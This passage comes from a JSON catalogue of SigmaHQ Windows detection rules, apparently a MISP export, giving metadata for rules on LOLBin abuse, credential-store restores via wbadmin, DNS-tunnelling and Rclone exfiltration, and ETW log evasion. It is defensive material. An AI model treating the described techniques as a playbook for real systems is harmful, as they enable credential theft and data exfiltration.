Roth (Nextron Systems)", "creation_date": "2023-05-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_regsvr32_network_pattern.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/tccontre18/status/1480950986650832903", "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/", "https://twitter.com/mrd0x/status/1461041276514623491", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "867356ee-9352-41c9-a8f2-1be690d78216", "value": "Potentially Suspicious Regsvr32 HTTP/FTP Pattern" }, { "description": "Detects the recovery of files from backups via \"wbadmin.exe\".\nAttackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2024-05-10", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wbadmin_restore_file.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery", "https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wbadmin_restore_file.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6fe4aa1e-0531-4510-8be2-782154b73b48", "value": "File Recovery From Backup Via Wbadmin.EXE" }, { "description": "Detects execution of \"certmgr\" with the \"add\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", "meta": { "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "creation_date": "2023-03-05", "falsepositive": [ "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" ], "filename": "proc_creation_win_certmgr_certificate_installation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certmgr_certificate_installation.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.004" ] }, "related": [ { "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ff992eac-6449-4c60-8c1d-91c9722a1d48", "value": "New Root Certificate Installed Via CertMgr.EXE" }, { "description": "Detects a suspicious program execution in Outlook temp folder", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-10-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_office_outlook_execution_from_temp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_execution_from_temp.yml" ], "tags": [ "attack.initial-access", "attack.t1566.001" ] }, "related": [ { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", "value": "Suspicious Execution From Outlook Temporary Folder" }, { "description": "Detects when a user downloads a file by using CertOC.exe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-05-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_certoc_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_download.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "70ad0861-d1fe-491c-a45f-fa48148a300d", "value": "File Download via CertOC.EXE" }, { "description": "Detects addition of users to the local Remote Desktop Users group via \"Net\" or \"Add-LocalGroupMember\".", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-12-06", "falsepositive": [ "Administrative activity" ], "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml" ], "tags": [ "attack.persistence", "attack.lateral-movement", "attack.t1133", "attack.t1136.001", "attack.t1021.001" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", "value": "User Added to Remote Desktop Users Group" }, { "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", "meta": { "author": "frack113", "creation_date": "2022-05-16", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_lolbin_ttdinject.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", "value": "Use of TTDInject.exe" }, { "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-08-13", "falsepositive": [ "Admin activity", "Scripts and administrative tools used in the monitored environment", "Monitoring activity" ], "filename": "proc_creation_win_whoami_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_execution.yml" ], "tags": [ "attack.discovery", "attack.t1033", "car.2016-03-001" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e28a5a99-da44-436d-b7a0-2afc20a5f413", "value": "Whoami Utility Execution" }, { "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)", "creation_date": "2022-08-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_obfuscated_ip_via_cli.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://h.43z.one/ipconverter/", "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "56d19cb4-6414-4769-9644-1ed35ffbb148", "value": "Obfuscated IP Via CLI" }, { "description": "Detects the use of SDelete to erase a file not the free space", "meta": { "author": "frack113", "creation_date": "2021-06-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sysinternals_sdelete.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_sdelete.yml" ], "tags": [ "attack.impact", "attack.t1485" ] }, "related": [ { "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a4824fca-976f-4964-b334-0621379e84c4", "value": "Potential File Overwrite Via Sysinternals SDelete" }, { "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "creation_date": "2019-01-09", "falsepositive": [ "Administrative scripts" ], "filename": "proc_creation_win_powershell_susp_ps_appdata.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03", "https://twitter.com/JohnLaTwC/status/1082851155481288706", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ac175779-025a-4f12-98b0-acdaeb77ea85", "value": "PowerShell Script Run in AppData" }, { "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-05-22", "falsepositive": [ "Weird admins that rename their tools", "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" ], "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/psexec", "https://www.poweradmin.com/paexec/", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml" ], "tags": [ "attack.resource-development", "attack.t1587.001" ] }, "related": [ { "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "207b0396-3689-42d9-8399-4222658efc99", "value": "Potential Privilege Escalation To LOCAL SYSTEM" }, { "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_msohtmed_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msohtmed_download.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", "value": "Arbitrary File Download Via MSOHTMED.EXE" }, { "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", "meta": { "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", "creation_date": "2021-09-30", "falsepositive": [ "DataSvcUtil.exe being used may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6", "https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services", "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", "https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe", "https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" ], "tags": [ "attack.exfiltration", "attack.t1567" ] }, "related": [ { "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e290b10b-1023-4452-a4a9-eb31a9013b3a", "value": "LOLBAS Data Exfiltration by DataSvcUtil.exe" }, { "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-06-22", "falsepositive": [ "False positives depend on scripts and administrative tools used in the monitored environment" ], "filename": "proc_creation_win_sysprep_appdata.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysprep_appdata.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", "value": "Sysprep on AppData Folder" }, { "description": "Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)", "meta": { "author": "Andreas Hunkeler (@Karneades), Florian Roth", "creation_date": "2021-12-17", "falsepositive": [ "Legitimate calls to system binaries", "Company specific internal usage" ], "filename": "proc_creation_win_java_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_susp_child_process.yml" ], "tags": [ "attack.initial-access", "attack.persistence", "attack.privilege-escalation" ] }, "uuid": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", "value": "Suspicious Processes Spawned by Java.EXE" }, { "description": "Well-known DNS Exfiltration tools execution", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/iagox86/dnscat2", "https://github.com/yarrick/iodine", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml" ], "tags": [ "attack.exfiltration", "attack.t1048.001", "attack.command-and-control", "attack.t1071.004", "attack.t1132.001" ] }, "related": [ { "dest-uuid": "79a4052e-1a89-4b09-aea6-51f1d11fe19c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "04fd5427-79c7-44ea-ae13-11b24778ff1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "98a96a5a-64a0-4c42-92c5-489da3866cb0", "value": "DNS Exfiltration and Tunneling Tools Execution" }, { "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", "meta": { "author": "frack113", "creation_date": "2022-05-07", "falsepositive": [ "ViberPC updater calls this binary with the following commandline \"ie4uinit.exe -ClearIconCache\"" ], "filename": "proc_creation_win_lolbin_ie4uinit.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/", "https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", "value": "Ie4uinit Lolbin Use From Invalid Path" }, { "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", "meta": { "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", "creation_date": "2021-05-10", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_pua_rclone_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone", "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_rclone_execution.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.002" ] }, "related": [ { "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e37db05d-d1f9-49c8-b464-cee1a4b11638", "value": "PUA - Rclone Execution" }, { "description": "Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields", "meta": { "author": "Markus Neis, Florian Roth", "creation_date": "2019-01-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_squiblytwo_bypass.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", "https://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html", "https://atomicredteam.io/defense-evasion/T1220/", "https://twitter.com/mattifestation/status/986280382042595328", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml" ], "tags": [ "attack.defense-evasion", "attack.t1047", "attack.t1220", "attack.execution", "attack.t1059.005", "attack.t1059.007" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8d63dadf-b91b-4187-87b6-34a1114577ea", "value": "Potential SquiblyTwo Technique Execution" }, { "description": "Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.\n", "meta": { "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "creation_date": "2019-03-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_etw_trace_evasion.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://abuse.io/lockergoga.txt", "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_etw_trace_evasion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070", "attack.t1562.006", "car.2016-04-002" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "74d2a63f-3c7b-4852-92da-02d8fbab16da", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", "value": "ETW Trace Evasion Activity" }, { "description": "Detect the usage of \"DirLister.exe\" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.", "meta": { "author": "frack113", "creation_date": "2022-08-20", "falsepositive": [ "Legitimate use by users" ], "filename": "proc_creation_win_dirlister_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md", "https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dirlister_execution.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b4dc61f5-6cce-468e-a608-b48b469feaa2", "value": "DirLister Execution" }, { "description": "Detects the execution of \"wmic\" with the \"group\" flag.\nAdversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", "meta": { "author": "frack113", "creation_date": "2021-12-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_recon_group.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_group.yml" ], "tags": [ "attack.discovery", "attack.t1069.001" ] }, "related": [ { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "164eda96-11b2-430b-85ff-6a265c15bf32", "value": "Local Groups Reconnaissance Via Wmic.EXE" }, { "description": "Detects the execution of a renamed office binary", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_office_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://infosec.exchange/@sbousseaden/109542254124022664", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_office_processes.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "0b0cd537-fc77-4e6e-a973-e53495c1083d", "value": "Renamed Office Binary Execution" }, { "description": "Detects a Windows command line executable started from MMC", "meta": { "author": "Karneades, Swisscom CSIRT", "creation_date": "2019-08-05", "falsepositive": "No established falsepositives", "filename": "proc_creation_win_mmc_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.003" ] }, "related": [ { "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", "value": "MMC Spawning Windows Shell" }, { "description": "Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2024-01-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_pua_pingcastle.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8", "https://github.com/projectHULK/AD_Recon/blob/dde2daba9b3393a9388cbebda87068972cc0bd3b/SecurityAssessment.ps1#L2699", "https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1", "https://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680", "https://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450", "https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/", "https://github.com/vletoux/pingcastle", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_pingcastle.yml" ], "tags": [ "attack.reconnaissance", "attack.t1595" ] }, "related": [ { "dest-uuid": "67073dde-d720-45ae-83da-b12d5e73ca3b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b1cb4ab6-ac31-43f4-adf1-d9d08957419c", "value": "PUA - PingCastle Execution" }, { "description": "Detects a suspicious process spawning from an Outlook process.", "meta": { "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", "creation_date": "2022-02-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_office_outlook_susp_child_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "208748f7-881d-47ac-a29c-07ea84bf691d", "value": "Suspicious Outlook Child Process" }, { "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-04-27", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files", "https://github.com/cube0x0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml" ], "tags": [ "attack.credential-access", "attack.t1588.002", "attack.t1003" ] }, "related": [ { "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "37c1333a-a0db-48be-b64b-7393b2386e3b", "value": "Hacktool Execution - PE Metadata" }, { "description": "Detects a code page switch in command line or batch scripts to a rare language", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "creation_date": "2019-10-14", "falsepositive": [ "Administrative activity (adjust code pages according to your organization's region)" ], "filename": "proc_creation_win_chcp_codepage_switch.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers", "https://twitter.com/cglyer/status/1183756892952248325", 